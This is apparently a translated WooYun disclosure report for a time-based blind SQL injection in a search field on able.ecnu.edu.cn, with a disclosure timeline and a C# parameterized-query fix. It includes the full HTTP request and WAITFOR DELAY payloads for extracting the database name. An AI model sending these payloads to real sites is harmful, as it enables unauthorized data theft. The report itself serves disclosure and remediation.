WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-11-08: Details reported to the vendor; awaiting vendor handling
2015-11-10: Vendor has confirmed; details disclosed to the vendor only
2015-11-20: Details disclosed to core white hats and experts in the relevant field
2015-11-30: Details disclosed to ordinary white hats
2015-12-10: Details disclosed to intern white hats
2015-12-25: Details disclosed to the public
POST /Able.Acc2.Web/Page_TeachFiles.aspx HTTP/1.1
Content-Length: 3301
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://able.ecnu.edu.cn
Cookie: ASP.NET_SessionId=b3gfzw45bfnu2iqeagrhlq55; AbleAcc2Language=zh-CN
Host: able.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ctl00%24ContentPlaceHolder1%24btnSearch=%e6%90%9c%e7%b4%a2&ctl00%24ContentPlaceHolder1%24acEndDate=01/01/1967&ctl00%24ContentPlaceHolder1%24acStartDate=01/01/1967&ctl00%24ContentPlaceHolder1%24txtfOrganizationName=iyevrtgt&ctl00%24ContentPlaceHolder1%24txtfTitle=r'if(len(db_name())=4) waitfor delay '0:0:5' -- &ctl00%24Home_Login1%24ImgBtnLogin=&ctl00%24Home_Login1%24txtCode=94102&ctl00%24Home_Login1%24txtLoginID=iyevrtgt&ctl00%24Home_Login1%24txtPassword=g00dPa%24%24w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALyjJjnDwKJicKUAwKC7pXpBwLb9ZTGDQL4naSuCwKN36n1DwKPupWbAgL3uvOGApdkC38vyINV8fHsP83bdFS35W44&__VIEWSTATE=[base64 __VIEWSTATE blob omitted]
The ctl00%24ContentPlaceHolder1%24txtfTitle parameter is vulnerable to SQL injection:
r'if(len(db_name())=4) waitfor delay '0:0:5' --
The database name is 4 characters long:
substring is filtered, so string comparison is used to extract the data. First character of the db name:
r'if(db_name()>'a') waitfor delay '0:0:5' --
Delay observed.
r'if(db_name()>'b') waitfor delay '0:0:5' --
No delay.
So the first character of the db name is b; comparing character by character in this way recovers all of the db data.
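The report does not include the server-side code. As an added illustration (not the application's own source), this C# sketch shows the pattern behind a txtfTitle search that behaves as described, a string-concatenated T-SQL query, beside the parameterized form that removes the injection; the table name TeachFiles, the column Title and the connection string are assumed.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

public static class TeachFileSearch
{
    // Hypothetical connection string and schema; the report does not show them.
    const string ConnectionString = "Server=.;Database=AbleAcc2;Integrated Security=true";

    // Vulnerable: the search text is spliced into the SQL text, so a value such as
    //   r'if(len(db_name())=4) waitfor delay '0:0:5' --
    // closes the string literal and appends its own statement. A keyword blacklist
    // (the application filtered "substring") does not change this: waitfor and the
    // comparison operators used in the report still reach the database.
    public static string BuildQueryUnsafe(string title)
    {
        return "SELECT Title FROM TeachFiles WHERE Title LIKE '%" + title + "%'";
    }

    // Fixed: the value travels as a typed parameter and is never parsed as SQL.
    // LIKE metacharacters are escaped so a search for "100%" matches literally.
    public static List<string> SearchTitles(string title)
    {
        var results = new List<string>();
        string pattern = "%" + EscapeLike(title) + "%";
        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(
            "SELECT Title FROM TeachFiles WHERE Title LIKE @pattern ESCAPE '\\'", conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 400).Value = pattern;
            cmd.CommandTimeout = 5; // bounds how long any single search may run
            conn.Open();
            using (SqlDataReader r = cmd.ExecuteReader())
                while (r.Read()) results.Add(r.GetString(0));
        }
        return results;
    }

    // Escape the LIKE wildcards so user input cannot alter the pattern's meaning.
    static string EscapeLike(string s) =>
        s.Replace("\\", "\\\\").Replace("%", "\\%").Replace("_", "\\_").Replace("[", "\\[");
}
```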
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-10 08:22
The responsible secondary unit has been notified to handle it.
None at present.